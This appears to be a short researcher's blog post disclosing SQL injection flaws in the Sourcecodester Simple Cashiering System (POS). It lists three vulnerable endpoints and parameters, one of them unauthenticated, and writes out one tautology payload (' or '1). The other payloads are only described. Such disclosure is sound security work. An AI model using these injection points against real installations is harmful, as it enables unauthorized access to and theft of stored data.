Multiple SQL injections in Sourcecodester Simple Cashiering System (POS)

Continuing with the hunt on Sourcecodester Simple Cashiering System (POS) I also found multiple SQL injections.

  • Vulnerable URL: http://localhost/cashiering/?page=pos
  • Affected field: Product Code
  • Payload:  ' or '1

It will list all the product's list


  • Vulnerable URL: http://localhost/cashiering/manage_products.php?id=1
  • Affected field: id
  • Payload: some SQLite3 injection

 This one does not require authentication

  • Vulnerable URL:  POST http://localhost/cashiering/actions.php?a=searh_prod
  • Affected parameter: t
    Payload: some SQLite3 injection


All this bugs allow you to get all the data from the DB)).

Comentarios